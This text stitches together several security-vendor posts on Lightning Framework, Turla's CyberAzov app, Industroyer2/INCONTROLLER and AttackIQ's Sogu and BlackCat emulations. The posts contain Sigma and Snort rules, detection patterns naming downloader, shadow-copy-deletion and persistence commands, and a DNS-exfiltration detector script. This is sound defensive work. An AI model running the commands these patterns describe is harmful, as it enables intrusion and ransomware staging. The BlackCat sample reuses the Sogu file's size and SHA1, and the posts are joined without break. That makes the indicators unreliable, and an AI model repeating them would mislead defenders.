There is a passive mode of communication available if the actor executes the RunShellPure command. This starts an SSH service on the infected machine with the Linux.Plugin.Lightning.Sshd plugin. The plugin is an OpenSSH daemon that has hardcoded private and host keys, allowing the attacker to SSH into the machine with their own SSH key, creating a secondary backdoor. 

Hardcoded keys inside the modified OpenSSH daemon

Summary

The Lightning Framework is an interesting malware as it is not common to see such a large framework developed for targeting Linux. Although we do not have all the files, we can infer some of the missing functionality based on strings and code of the modules that we do possess. Soon we will release another blog about detection opportunities for Lightning Framework using osquery.

We would like to extend a huge thanks to our friends and partners at IBM and SentinelOne for their help in investigating this threat.

IOCs for Lightning Framework

Hashes

File | SHA256
Lightning.Downloader | 48f9471c20316b295704e6f8feb2196dd619799edec5835734fc24051f45c5b7
Lightning.Core | fd285c2fb4d42dde23590118dba016bf5b846625da3abdbe48773530a07bcd1e
Linux.Plugin.Lightning.Sshd | ad16989a3ebf0b416681f8db31af098e02eabd25452f8d781383547ead395237

Detection Rules

title: Lightning Framework File Path
status: experimental
description: Detects creation of files related to Lightning Framework.
author: Intezer
references:
    - https://www.intezer.com
logsource:
    product: linux
    category: file_create
detection:
    selection1:
        TargetFilename|startswith:
            - '/usr/lib64/seahorses/'
    selection2:
        TargetFilename|contains:
            - 'kbioset'
            - 'cpc'
            - 'kkdmflush'
            - 'soss'
            - 'sshod'
            - 'nethoogs'
            - 'iftoop'
            - 'iptraof'
    condition: selection1 and selection2
falsepositives:
    - Unknown.

title: Lightning Default C2 Communication
status: experimental
description: Detects communication to default local ip for Lightning Framework
author: Intezer
references:
    - https://intezer.com
logsource:
    category: firewall
detection:
    select_outgoing:
        dst_ip: 10.2.22.67
        dst_port: 33229
    condition: select_outgoing
falsepositives:
    - Unknown.

MITRE ATT&CK

Tactic | Technique | ID | Description
Persistence | Boot or Logon Initialization Scripts | T1037 | An init.d script is used for persistence of downloader module
Persistence | SSH Authorized Keys | T1098.004 | SSH keys can be added to the authorized_keys file
Defense Evasion | Obfuscated Files or Information | T1027 | The C2 profile is encoded on disk
Defense Evasion | Deobfuscate/Decode Files or Information | T1140 | The C2 profile is decoded with a dynamic XOR algorithm
Defense Evasion | Hide Artifacts | T1564 | Many artifacts are hidden including ports, PIDs, and file timestamps
Defense Evasion | Masquerading | T1036 | Many files are masqueraded as other files or tasks
Defense Evasion | Rootkit | T1014 | LKM and LD_PRELOAD rootkits are used
Defense Evasion | Timestomp | T1070.006 | Files created by Lightning are modified to match that of other utilities
Defense Evasion | File Deletion | T1070.004 | The framework has the ability to remove itself
Discovery | File and Directory Discovery | T1083 | The framework can list files and directories on infected systems
Discovery | Network Service Discovery | T1046 | Multiple plugins can be used to perform network service discovery
Discovery | Network Sniffing | T1040 | Multiple plugins can be used to perform network sniffing
Discovery | System Information Discovery | T1082 | Lightning can perform detailed system fingerprinting
Command and Control | Data Encoding | T1132 | Data from the C2 is encoded
Command and Control | Non-Application Layer Protocol | T1095 | Communication with the C2 is performed over TCP
Command and Control | Proxy | T1090 | The framework has the ability to start a Socks5 proxy
Command and Control | Exfiltration Over C2 Channel | T1041 | Data can be exfiltrated

The post Lightning Framework: New Undetected “Swiss Army Knife” Linux Malware ⚡ appeared first on Intezer.

The Russian hacking group Turla released an Android app that seems to aid Ukrainian hackers in their attacks against Russian networks. It’s actually malware, and provides information back to the Russians:

The hackers pretended to be a “community of free people around the world who are fighting russia’s aggression”—much like the IT Army. But the app they developed was actually malware. The hackers called it CyberAzov, in reference to the Azov Regiment or Battalion, a far-right group that has become part of Ukraine’s national guard. To add more credibility to the ruse they hosted the app on a domain “spoofing” the Azov Regiment: cyberazov[.]com.

[…]

The app actually didn’t DDoS anything, but was designed to map out and figure out who would want to use such an app to attack Russian websites, according to Huntley.

[…]

Google said the fake app wasn’t hosted on the Play Store, and that the number of installs “was miniscule.”

Details from Google’s Threat Analysis Group here.

In our new threat briefing report, Forescout’s Vedere Labs presents the most detailed public technical analysis of Industroyer2 and INCONTROLLER (also known as PIPEDREAM), the newest examples of ICS-specific malware that were disclosed to the public almost simultaneously, on April 12 and 13. Thankfully, both Industroyer2 and INCONTROLLER were caught before causing physical disruption.

Although there have been previous reports about both malware families analyzed in this research, we present the following new contributions:

Description of a functionality in Industroyer2 to discover the target’s Common Address of ASDU. Despite not being used in the analyzed sample, given its hardcoded configuration, this might have been used in previous reconnaissance stages to gather information about the target.
An analysis of the similarity of the IEC-104 implementation in Industroyer that reveals it is probably a modified version of a publicly available implementation.
The most detailed public description so far of Lazycargo, a part of INCONTROLLER that became publicly available recently and is used to execute other parts of the malware.

In this post, we detail how Forescout helps to protect against the new malware. The full report also contains a list of indicators of compromise (IOCs) and recommended mitigations.

Overview of the new ICS-specific malware

Industroyer2 leverages OS-specific wipers and a dedicated module to communicate over the IEC-104 industrial protocol. INCONTROLLER is a full toolkit containing modules to send instructions to or retrieve data from ICS devices using industrial network protocols such as OPC UA, Modbus, CODESYS, Machine Expert Discovery and Omron FINS. Additionally, Industroyer2 has a highly targeted configuration, while INCONTROLLER is much more reusable across different targets.

ICS-specific malware is still very rare compared to commodity malware such as ransomware or banking trojans. Industroyer2 and INCONTROLLER follow previous known examples such as Stuxnet, Havex, BlackEnergy2, Industroyer and TRITON, shown in the timeline below.

[Figure: timeline of ICS-specific malware]

Industroyer2 is believed to be developed and deployed by the Sandworm APT, linked to the Russian GRU, which was behind the original attacks on the Ukrainian power grid in 2015 and 2016. The Industroyer2 incident follows recent activity against the APT in 2022, such as the disruption of the Cyclops Blink botnet. There is still no conclusive evidence about the actors behind INCONTROLLER, their motives or objectives.

Both new malware families show that abusing often insecure-by-design native capabilities of OT equipment continues to be the preferred modus operandi of real-world attackers. Vedere Labs recently disclosed a set of 56 insecure-by-design vulnerabilities in OT equipment called OT:ICEFALL, which included Omron controllers that were targeted by INCONTROLLER. The emergence of new vulnerabilities and new malware exploiting the insecure-by-design nature of OT supports the need for robust OT-aware network monitoring and deep packet inspection capabilities.

For more information and technical analysis, read the full report.


Mitigation recommendations for ICS malware

Forescout eyeInspect customers can follow the recommendations below to help ensure they are protected against Industroyer2 and INCONTROLLER.

Stay current with the release of additional content such as scripts and IOCs on the OT Portal or through your Forescout representatives.
Monitor network exposure for control systems and HMIs.
Monitor connections to devices outside of documented norms for the device and environment, with special attention to HTTP and Telnet connections to these devices.
Monitor unauthorized Telnet connection attempts, including the use of default credentials.
Detect ICMP usage, and especially possible ping sweeps, through the ICMP indicators in the Industrial Threat Library devoted to detecting possible port scans and discoveries.
Apply additional configurations on eyeInspect to perform intrusion detection on known nodes. Available approaches include protocol blacklisting and communication whitelisting with traffic rules.
Leverage the Threat Detection Add-Ons script, which contains additional checks for lateral movement and user account manipulation that may reveal attempts to gain administrative rights.
Closely monitor the protocols abused by both malware families for signs of anomalies: IEC-104 (2404/TCP), OPC UA (4840/TCP, 4843/TCP), Modbus (502/TCP), Machine Expert Discovery (27126/UDP, 27127/UDP), CODESYS (1740-1743/UDP, 11740-11743/TCP, 1105/TCP) and Omron FINS (9600/TCP, 9600/UDP). Below are specific recommendations for each protocol in eyeInspect.

IEC-104

eyeInspect has extensive coverage of IEC-104 anomalies with malformed packet detection (possible indicator of exploit), anomaly baselining detection and a vast Industrial Threat Library covering anomalous behaviors, dangerous operations and much more.

OPC UA

Monitor the alerts and events related to the OPC UA protocol. eyeInspect offers dozens of events related to anomalies like credential bruteforcing, bad certificate usage, anomalous connection attempts, configuration changes and changes to OPC UA tags.
Monitor OPC UA connections, especially newly established or anomalous OPC UA connections through dedicated filters, analytics, maps and the change logs.

MODBUS/Schneider Electric

Monitor the alerts and events related to the MODBUS protocol. eyeInspect offers dozens of events related to anomalies like error codes associated with abnormal device crashes/reboots, files uploaded or downloaded, file deletion, unauthorized changes in device configuration and execution of commands.
Add an anomaly detection-specific blacklisting rule on ports 27126 and 27127 that target IP broadcast 255.255.255.255, to identify the Machine Expert Discovery protocol used in the initial phase. (A premade profile is available on request through Forescout representatives or Customer Support.)
Install the new Device and Visibility Addons Script 3.2 (or newer) to detect and vet devices using this discovery protocol.

OMRON FINS

Implement the OMRON FINS Monitor script to receive more alerts and details about unauthorized changes in device configuration and execution of commands, files uploaded or downloaded and tons of other anomalies (available on request through Forescout representatives).

The post Industroyer2 and INCONTROLLER: New Findings and How Forescout Protects Against the Most Recent ICS-Specific Malware appeared first on Forescout.


Introduction

Malware often forms the foundation for an adversary cyberattack, giving adversaries a means to employ a range of tactics, techniques, and procedures (TTPs) against a target to achieve their strategic objectives. For analysts, adversary malware also provides insights into an adversary’s behavior when more complete incident response data is unavailable, particularly at the procedure level. Defenders can then improve their security posture by testing their defenses against the malware in advance, but only if the assessment can be done easily.

Attack graphs give us a means of arranging real-world malware into its component TTPs to run emulations, and today we are immensely excited to announce our new malware emulation attack graphs.

How do we build it? AttackIQ’s adversary research team analyzes real-world malware and then arranges the TTPs into a logical flow that emulates specific adversary behaviors. The resulting attack graph gives you a cornerstone of hard data – a detailed adversary emulation – to run against your security program and test your defense performance.

What sets malware emulation attack graphs apart from AttackIQ’s other attack graphs is their focus on the TTPs made possible by the malware itself (rather than in an entire adversary intrusion sequence, which could include manual TTPs). Often in incident reports, malware TTPs are either unknown or not understood. Analysts often don’t know whether the TTPs reported in an incident are features of the malware itself, or if they are employed by an intruder manually. AttackIQ’s malware emulation attack graphs focus on key aspects of malware used across many campaigns. They give defenders the opportunity to validate and tune their endpoint security controls and network security controls against each logical stage of a specific malware strain.

Specifically, a malware-based threat assessment helps defensive teams to:

identify core behavior observed in specific malware samples
identify the security technologies that can detect and prevent behaviors in specific malware samples
evaluate the efficacy of defensive technologies (and the overarching security stack) in detecting and preventing specific malware behaviors; and
identify gaps in the team’s security posture that could be filled or improved to detect and prevent specific TTPs.

To kick off these new attack graphs, we chose the ever-prevalent Sogu (a.k.a. PlugX) remote access tool (RAT) and the recent Rust-based ransomware, BlackCat (a.k.a. ALPHV). We will cover these new additions to the AttackIQ Security Optimization Platform in a live demo on May 26, 2022 at 10:00 PT.

Sogu (PlugX)

Sogu (a.k.a. PlugX) is a full-featured, modular RAT with many variants and is used by multiple China-based groups within the espionage threat class, including APT41, APT10, UNC124, Mustang Panda, and others. Sogu has been around for more than a decade, with early reporting as far back as 2008, yet it continues to target victims around the world, including the semiconductor industry and nation-state governments.

Our Sogu/PlugX attack graph is derived from a sample used in an intrusion by China-based threat actors that targeted the semiconductor and high-tech subsector of the manufacturing industry in July 2020.

This sample was delivered in a self-extracting (SFX) RAR file which contains three files required to implement a DLL side-loading method of execution. When this SFX RAR file is opened by an unwitting user, these files are written to disk and the executable is run.

Legitimate kick-off executable (in the sample analyzed this was a McAfee program).
Hijacked DLL that loads/launches Sogu/PlugX (this DLL is considered hijacked because the legitimate program will natively load the DLL).
Encrypted file holding encrypted Sogu shellcode payload.

This method and required set of files is commonly seen with Sogu/PlugX variants.

Metadata from the sample analyzed

Description: SFX RAR file
Size (bytes): 327583
SHA1: 09deeb57240711b9fcf33d0b154c9ffd0e0984b1

Description: Legitimate exe file
Size (bytes): 140576
SHA1: d201b130232e0ea411daa23c1ba2892fe6468712

Description: Hijacked DLL, loads the payload file
Size (bytes): 199168
SHA1: 040ae092a0ab8801a92c4d0d533a03ce13595e1f

Description: Encrypted payload file
Size (bytes): 121128
SHA1: eb9f611889ef99c7b0c4006e1dea50dd5a8c7f93

This attack graph focuses on the sample’s core TTPs, captured by the following scenarios that emulate behavior as the malware progresses through its code execution.

[Figure: Sogu attack graph]

Scenarios 1 and 2: Initial Access: Spearphishing (T1566.002): Sogu is commonly delivered to targets using spearphishing links. For the first scenario in the graph, we begin with the step after a link was clicked by downloading the SFX RAR file package to the endpoint, giving A/V and potentially network security controls the opportunity to detect and or prevent delivery.

1a. Detection Process

Parent Process Name == (Winword.exe OR Excel.exe OR Powerpnt.exe)
Process Name == (cmd.exe OR powershell.exe)
Command Line CONTAINS (("DownloadString" OR "DownloadFile") AND "HTTP" AND ("Invoke-Expression" OR "IEX"))

1b. Mitigation Policies

MITRE recommends the following mitigations for T1566.002:

M1047
M1021
M1054
M1018
M1017

Scenario 3: Save Malicious DLL to Disk: If the SFX RAR file is successfully opened, the trio of files will be written to the victim’s disk. Of these three files, the malicious DLL gives another opportunity to test A/V protection since it isn’t obfuscated like the encrypted Sogu shellcode payload file. This scenario saves the constituent hijacked DLL to disk, mimicking the SFX RAR file’s write operation to the host machine.

3a. Detection Process

While A/V, NGAV and EPP security controls excel at detecting malicious files being saved to disk, Application Control technologies provide opportunities to detect unsigned DLLs being saved to disk. Further, execution of unsigned filetypes (such as DLLs) specified in your Application Control policies can be prevented/blocked. Additionally, EDR technologies have the ability to detect these unsigned filetypes being saved to globally writable directories on devices. However, the latter may be false positive prone and lead to excessive alerts. In addition to looking for unsigned DLLs being placed in globally writable directories, using YARA detections to look for strings in malware files is an alternate/effective way of detecting this activity on your endpoints:

PlugX / Sogu YARA Rules

3b. Mitigation Policies

Ensure that devices are placed within a protective (not detective) antivirus policy to act on files through static and dynamic analysis.
Ensure account management is correctly configured through group policy, ensuring proper users only have rights to write to sensitive areas on disk.
Ensure application control technology policies are thought-through, tuned and maintained; you can get very granular with what types of files are indexed and can execute on which systems in your network. For example, self-extracting RAR files can be banned entirely on your network, or unsigned DLLs can be prevented from executing. Attempted execution of banned files is logged and can flow into your SIEM for further alerting or correlation.

Scenario 4: Hijack Execution Flow: DLL Side-Loading (T1574.002): Once the three files are written to disk, the SFX RAR file automatically runs the legitimate McAfee executable, leading to the DLL side-loading technique. In DLL side-loading, the legitimate binary attempts to load a required DLL and, instead of loading the normal benign DLL, loads a hijacked version because it resides in the same directory as the McAfee executable.

4a. Detection Process

Process Name == evt.exe (This is the name of the trusted McAfee executable extracted from the RAR file. This binary name is subject to change)
Imageload Name == McUtil.dll (This is the name of the DLL extracted from the RAR file. This binary name is subject to change)
Imageload is_signed == False

4b. Mitigation Policies

MITRE recommends the following mitigations for T1574.002:

M1013
M1051

Additionally, if the legitimate file that is used to load a DLL is not a binary needed for your organization, add the hashes to your application control block lists as soon as possible. Binaries on a block list will not be able to execute even if they are benign by nature.

Scenario 5: Process Injection (T1055.001): Sogu uses process injection both reflectively and remotely to evade defenses. Malicious code can sometimes go undetected by security products because it is running inside a legitimate process. Our emulation mimics DLL code injection by using Windows API calls to LoadLibrary and CreateRemoteThread to inject code into a legitimate process.

5a. Detection Process

Utilize tools such as Procmon.exe or EDR tools to monitor for system Windows API calls such as “LoadLibrary” and “CreateRemoteThread” with unsigned or unrecognized binaries, especially if they are coming from locations that are globally writable or not belonging to the associated injected process.

Process Name == evt.exe (This is the name of the trusted McAfee executable extracted from the RAR file. This binary name is subject to change)
Imageload Name == McUtil.dll (This is the name of the .dll extracted from the RAR file. This binary name is subject to change)
Imageload is_signed == False

5b. Mitigation Policies

MITRE recommends the following mitigations for T1055.001:

M1040

Scenario 6: Persistence via Windows Service (T1543.003): If the malware executes with elevated privilege, persistence is established by creating a new service that will initiate the execution of the benign McAfee binary, starting the process of malicious code execution again.

6a. Detection Process

Process Name == (cmd.exe or powershell.exe)
Command Line CONTAINS ((‘sc’ or ‘sc.exe’) AND ‘create’ AND ‘binpath=”<path to trusted executable>”’ AND start=”auto”)

6b. Mitigation Policies

MITRE recommends the following mitigations for T1543.003:

M1047
M1040
M1045
M1028
M1018

Scenario 7: Persistence via Registry Run Key (T1547.001): Alternatively, if the malware is executed as a normal user, persistence is achieved using a standard registry run key. Our attack graph will take this persistence path if the service creation is prevented in the previous scenario.

7a. Detection Process

As registry key modifications are typical Windows system behavior, what is unusual is registry actions attempted by unexpected or underprivileged users. This detection excludes administrative or expected users to reduce false positives from expected system usage.

Process Name == (cmd.exe or powershell.exe)

User NOT IN <list of expected reg.exe users>

Command Line CONTAINS (("reg" OR "reg.exe") AND ("HKEY_CURRENT_USER" OR "HKEY_LOCAL_MACHINE") AND "SOFTWARE\Microsoft\Windows\CurrentVersion" AND ("run" OR "runonce"))

7b. Mitigation Policies

Although it is expected Windows behavior for these registry keys to be modified so that programs start at boot, modification of them can be constrained by setting group policy and application control/whitelisting, allowing only authorized users to use tools such as cmd.exe, powershell.exe, reg.exe, and regedit.exe.

Scenarios 8 and 9: Command and Control: DNS (T1071.004): After persistence is set, the malware establishes communication with command and control (C2) infrastructure by abusing the Domain Name System (DNS) application layer protocol to avoid detection/network filtering.

This Sogu sample is configured to send DNS callouts in TXT records that carry encoded victim information prepended to the threat actor-controlled domain. Example:

ENCODEDDATA.ENCODEDDATA.ENCODEDDATA.badSubdomain.badDomain.bad

An initial DNS request is sent through a hardcoded public Google DNS server, 8.8.8.8, which we assess to be a way around potential internal network DNS blacklisting implemented by the victim organization’s security team.

If the Google DNS resolution fails, potentially due to web proxy or DNS policy disallowing external DNS requests, a fallback callout that is identical in content is sent to the host’s default DNS server. Our scenario emulates the structure of the encoded data in these callouts and is sent to AttackIQ infrastructure. This provides defenders the opportunity to build network detections for anomalous DNS traffic like this, which could prove useful beyond Sogu detection.

8a. Detection Process

Typically, C2 traffic is sent through HTTP/HTTPS which is often monitored by network firewalls and content filtering security controls. Threat actors using Sogu/PlugX utilize the DNS protocol to remain undetected. Creating network Snort rules to alert on any UDP 53 connections to flagged IPs may be an effective way to alert on possible C2 activity from threat actors utilizing this technique.

alert udp any 53 -> $HOME_NET any (msg:"Possible Sogu/PlugX C2 address in DNS response"; content:"|43 D7 41 85|"; sid:1000001; rev:1;)

Please note, the content portion here is the hexadecimal byte representation of the destination IP address for the DNS request (i.e., the C2) and should be modified as IP artifacts are collected. The sid shown is a local-range placeholder; assign one from your own rule numbering.
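As an added example (not AttackIQ's code), the following Python script flags DNS query log lines shaped like the callouts described for Scenarios 8 and 9: TXT queries with long, high-entropy labels prepended to a domain, endpoints querying 8.8.8.8 directly, and the same name retried against the internal resolver shortly afterwards. The resolver addresses, thresholds and the sample log are assumptions.

```python
"""Flag DNS queries shaped like the Sogu TXT-record callouts described above.

Three signals are checked: TXT queries whose leading labels look like encoded
data, endpoints talking directly to the hardcoded public resolver (8.8.8.8),
and the same name retried against the internal resolver shortly afterwards
(the fallback behaviour). Thresholds below are assumptions, not from the page.
"""
import math
from collections import defaultdict

INTERNAL_RESOLVERS = {"10.0.0.53"}          # assumption: the organisation's own DNS servers
PUBLIC_RESOLVERS = {"8.8.8.8", "8.8.4.4"}   # Google DNS, hardcoded in the Sogu sample
LABEL_MIN_LEN = 16        # encoded-data labels are long ...
ENTROPY_MIN = 3.5         # ... and look random (Shannon entropy, bits per character)
MIN_ENCODED_LABELS = 2    # ENCODEDDATA.ENCODEDDATA.<actor domain>
FALLBACK_WINDOW = 10      # seconds between the Google attempt and the internal fallback

# Constructed sample log (not real traffic), one query per line:
# epoch_seconds client_ip resolver_ip qtype qname
SAMPLE_LOG = """\
1652900000 10.0.1.25 10.0.0.53 A www.example.com
1652900001 10.0.1.25 8.8.8.8 TXT mzxw6ytboi2gs3thfzwgc5dff4swy3ltfvxgkzi.n5xgk4jaw4ffcrjqe2zq.badSubdomain.badDomain.bad
1652900003 10.0.1.25 10.0.0.53 TXT mzxw6ytboi2gs3thfzwgc5dff4swy3ltfvxgkzi.n5xgk4jaw4ffcrjqe2zq.badSubdomain.badDomain.bad
1652900010 10.0.1.30 10.0.0.53 TXT _dmarc.example.com
1652900012 10.0.1.30 10.0.0.53 A cdn.static-assets.example.net
"""


def shannon_entropy(text):
    """Bits of entropy per character; random-looking encoded data scores high."""
    if not text:
        return 0.0
    counts = defaultdict(int)
    for ch in text:
        counts[ch] += 1
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def parse_log(text):
    """Parse the whitespace-separated sample format into dicts."""
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, client, resolver, qtype, qname = line.split()
        rows.append({"ts": int(ts), "client": client, "resolver": resolver,
                     "qtype": qtype.upper(), "qname": qname.lower().rstrip(".")})
    return rows


def looks_encoded(qname):
    """True when at least MIN_ENCODED_LABELS labels are long and high-entropy."""
    suspicious = [label for label in qname.split(".")
                  if len(label) >= LABEL_MIN_LEN and shannon_entropy(label) >= ENTROPY_MIN]
    return len(suspicious) >= MIN_ENCODED_LABELS


def detect(rows):
    """Return (rule, client, qname) findings in time order."""
    findings = []
    last_public = {}   # (client, qname) -> ts of the last query sent to a public resolver
    for r in sorted(rows, key=lambda r: r["ts"]):
        key = (r["client"], r["qname"])
        if r["qtype"] == "TXT" and looks_encoded(r["qname"]):
            findings.append(("encoded_txt", r["client"], r["qname"]))
        if r["resolver"] in PUBLIC_RESOLVERS and r["client"] not in INTERNAL_RESOLVERS:
            # an endpoint bypassing internal DNS, as the sample does with 8.8.8.8
            findings.append(("public_resolver", r["client"], r["qname"]))
            last_public[key] = r["ts"]
        elif (r["resolver"] in INTERNAL_RESOLVERS and key in last_public
              and r["ts"] - last_public[key] <= FALLBACK_WINDOW):
            # identical query retried internally: the fallback path described above
            findings.append(("fallback_pair", r["client"], r["qname"]))
    return findings


if __name__ == "__main__":
    for finding in detect(parse_log(SAMPLE_LOG)):
        print(*finding)
```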

8b. Mitigation Policies

MITRE recommends the following mitigations for T1071.004:

M1037
M1031

Scenario 10: Input Capture: Keylogging (T1056.001): With the C2 channel established, the running implant can now receive commands or Sogu plugins enabling additional capability from the external C2 server. One of the most common commands received is the enabling of keylogging functionality. The scenario uses a system hooking routine to capture any keystrokes using calls to the Windows API.

10a. Detection Process

MITRE detection recommendations for T1056.001:

DS0009
DS0027

Scenario 11: Windows Command Shell (T1059.003): Another post-exploitation behavior of Sogu is the use of the Windows command shell for execution of reconnaissance commands. If the keylogger activity in the previous scenario is prevented by security controls, a command shell is initiated and the following commands are executed: ipconfig, whoami, systeminfo

11a. Detection Process

Process Name == (cmd.exe OR powershell.exe)
Command Line CONTAINS "systeminfo"
User NOT IN <list of expected administrators to be issuing these commands>

11b. Mitigation Policies

MITRE mitigation Recommendations for T1059.003:

M1038

Additionally, ensure that Group Policy is set and enforced so that only authorized users and administrators can run cmd.exe or powershell.exe. Access to these interpreters can be removed for lower-privileged users who do not need them, to prevent enumeration or abuse.

Scenario 12: Data Exfiltration Over HTTP (T1048.003): In the final technique of the attack graph, we emulate exfiltration of data over HTTP by compressing mocked data and transmitting it to an AttackIQ-controlled server.

12a. Detection Process

MITRE detection Recommendations for T1048.003:

DS0017
DS0022

12b. Mitigation Policies

MITRE mitigation Recommendations for T1048.003:

M1057
M1037
M1031
M1030

BlackCat (ALPHV) Ransomware

BlackCat (a.k.a. ALPHV) emerged as Ransomware-as-a-Service (RaaS) as early as mid-November 2021, providing would-be attackers with a highly configurable, multi-platform ransomware strain written in Rust. BlackCat operators use the double-threat extortion model, which not only encrypts victim data but also threatens public exposure of sensitive information collected and exfiltrated prior to ransomware deployment.

According to an April 2022 FBI report, BlackCat has compromised at least 60 organizations worldwide through March 2022. True to the nature of RaaS, victim sectors are wide ranging, and have been reported to include German oil, European port authorities, high-end fashion/apparel, and higher education institutions in the United States.

The sample analyzed for our content development was obtained from a known public malware repository and was first submitted to VirusTotal in December 2021.

Sample Metadata

Description: BlackCat.exe (Win32)
Size (bytes): 327583
SHA1: 09deeb57240711b9fcf33d0b154c9ffd0e0984b1

Our BlackCat attack graph emulates a series of core behaviors beginning with introducing the ransomware to the environment, moving through configuration of the host for efficient and effective encryption, preparation for propagation, and finally to BlackCat’s ransomware encryption method.

Attack Graph: BlackCat

Scenarios 1 and 2: Ingress Tool Transfer (T1105): Intruders bring BlackCat into a victim environment after it has been breached. To begin this attack graph, we assume that initial access has been achieved and emulate the introduction of the ransomware to the endpoint. This pair of scenarios downloads a Windows-based BlackCat sample and saves it to disk, giving A/V security controls an opportunity to detect inbound tool delivery, and also loads it into memory.

1a. Detection Process

Once a malicious actor has compromised an endpoint, they may attempt to transfer any tools or malware onto the device. Attackers may utilize tools such as PowerShell, Certutil, Bitsadmin, and Curl.

PowerShell Example:

Process Name == (cmd.exe OR powershell.exe)
Command Line CONTAINS (("IWR" OR "Invoke-WebRequest") AND "DownloadData" AND "Hidden")

Certutil Example:

Process Name == certutil.exe
Command Line CONTAINS ("-urlcache" AND "-f")

Bitsadmin Example:

Process Name == bitsadmin.exe
Command Line CONTAINS ("/transfer" AND "http")

Curl Example:

Process Name == curl.exe
Command Line CONTAINS ("http" AND "-o")

1b. Mitigation Policies

MITRE mitigation Recommendations for T1105:

M1031

Additionally, it is advised that non-administrators be prevented from using tools such as powershell.exe, cmd.exe, and certutil.exe. This prevents malicious use of these tools from end-user accounts.

Scenario 3: Windows Management Instrumentation (WMI) Commands (T1047): One of the first things BlackCat does is grab the host machine’s Windows UUID, which is used to build a unique victim identifier for the ransom process. The malware retrieves this piece of information by using a living-off-the-land tool, WMI, to issue the command “csproduct get UUID”.

3a. Detection Process

Developing a baseline of the binaries that wmiprvse.exe typically invokes in your environment, and then using that baseline in a detection, is a good step toward monitoring abnormal Windows Management Instrumentation activity. For example, a detection that alerts on any process not in a list of known processes being invoked from wmiprvse.exe would identify possible malicious activity.

Monitoring the endpoint for the following would also alert on possible suspicious use:

Process Name == wmic.exe
Command Line CONTAINS ("process call create" AND (".dll" OR ".exe"))

3b. Mitigation Policies

MITRE mitigation Recommendations for T1047:

M1040
M1038
M1026
M1018

Additionally, ensure only administrators are authorized to utilize the Windows Management Instrumentation as this tool may be utilized for enumeration, lateral movement, and command execution as seen in this scenario.

Scenario 4: Impair Defenses: Disable or Modify Tools (T1562.001): Here, we implement a new custom scenario that emulates BlackCat’s attempt to allow Remote Symbolic Links on the host using the fsutil command. Enabling these remote symbolic links can expand access to remote file locations for encryption as well as create additional pathways for propagation.

4a. Detection Process

Process Name == (cmd.exe OR powershell.exe)
Command Line CONTAINS ("fsutil" AND "SymlinkEvaluation" AND ("R2L:1" OR "R2R:1"))

4b. Mitigation Policies

MITRE mitigation Recommendations for T1562.001:

M1022
M1024
M1018

Scenario 5: Modify Registry (T1112): In this scenario we emulate BlackCat’s addition of a registry key that maximizes concurrent network requests made by the host, likely to prevent any hiccups during file encryption of remotely available files. The “MaxMpxCt” key is set to 65535.

5a. Detection Process

Process Name == (cmd.exe OR powershell.exe)
Command Line CONTAINS (("reg" OR "reg.exe") AND "add" AND "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" AND "/V MaxMpxCt")

5b. Mitigation Policies

MITRE mitigation Recommendations for T1112:

M1024

Scenario 6: File Deletion: Volume Shadow Copy (T1070.004): Using the Windows command shell, this scenario reproduces the deletion of Volume Shadow Copies. BlackCat and other ransomware lines make use of this technique to restrict the victim’s ability to restore the encrypted files from backup.

6a. Detection Process

Process Name == vssadmin.exe
Command Line CONTAINS ("delete shadows")

6b. Mitigation Policies

It is recommended that Group Policy settings and application control/whitelisting software be configured to allow only authorized users access to tools such as vssadmin.exe, cmd.exe, and powershell.exe, to prevent misuse if an account is compromised.

Additionally, ensure that backup files can only be accessed by authorized personnel; underprivileged user accounts should have neither read nor write access to them.

Scenario 7: System Network Configuration Discovery (T1016): If configured to do so, BlackCat will propagate across a victim’s local network. To spread to neighboring machines, discovery actions are needed to identify the pathways available from the origin host. Network topology data points are obtained by reproducing BlackCat’s network share discovery and its MAC address snooping with “arp” commands.

7a. Detection Process

Typically, system enumeration is carried out using benign Windows applications. This allows an attacker to gain additional information about the target environment without setting off alarms by using malware or software that AV might flag. Since these techniques rely on benign Windows processes, the following detections should exclude expected users such as network administrators to reduce false positives:

Enumeration through “net” command

Process Name == (cmd.exe OR powershell.exe)
Command Line CONTAINS (("net" OR "net.exe") AND "use")
User NOT IN <list of expected net.exe users>

Enumeration through “arp” command

Process Name == (cmd.exe OR powershell.exe)
Command Line CONTAINS ("arp -a")
User NOT IN <list of expected network admins>

7b. Mitigation Policies

Although these are benign Windows commands, they can be used maliciously if threat actors have compromised an account. To reduce this information disclosure, cmd.exe and powershell.exe should be restricted to only the administrative users who need them.

Additionally, Windows command line auditing can be enabled: turn on the Audit Process Creation policy to generate event ID 4688, and enable the GPO setting “Include command line in process creation events” so that 4688 records carry the command line. These events can be forwarded from all endpoints to a SIEM for further filtering, tuning, and correlation to detect anomalous activity.

Scenario 8: Ingress Tool Transfer (T1105): BlackCat carries a copy of the PsExec utility in its resources, which is written to disk and likely used to spread itself if configured for propagation. In the sample we analyzed, propagation is not enabled; however, we included this behavior because it is a configurable option and PsExec is a tool commonly abused by attackers to achieve various results, including moving files over the network and remote process execution.

8a. Detection Process

PsExec is not malicious by nature and is signed by Microsoft, as it is a Microsoft-published Sysinternals tool. It may, however, be used maliciously to move laterally between devices within a network, and its use should be monitored and limited to authorized users. If this is not an expected binary for network administrators in your environment, we recommend periodically checking for the file to see whether any copies have been placed on systems without approved intent. PsExec with alternate credentials specified on the command line produces a Logon Type 3+2 event; note that this passes those credentials in plaintext across the network and leaves them vulnerable to theft on the target host. PsExec usage without explicit credentials is a Type 3 Logon event and does not leave any credentials on the target host.

8b. Mitigation Policies

MITRE mitigation Recommendations for T1105:

M1031

Even legitimate usage of PsExec is still problematic from a security perspective. For the best security, PsExec should be globally banned from execution using Application Control/whitelisting software. Sys Admin or authorized usage of PowerShell Remoting is a much more secure and preferred option for legitimate Type 3 Logons in your environment and does not leave credentials on the target host.

Scenario 9: File and Directory Discovery (T1083): At this stage of the kill chain, BlackCat preps for file encryption by enumerating the filesystem searching for data to encrypt.

9a. Detection Process

Searching the file system on Windows machines is typically done from the CLI with the “dir” command. This is normal Windows behavior, but monitoring for it may help identify malicious actions in your environment. Enumeration output on endpoints is often redirected to a file for later exfiltration and examination by the attacker:

Process Name == (cmd.exe OR powershell.exe)
Command Line CONTAINS ("dir" AND ">")

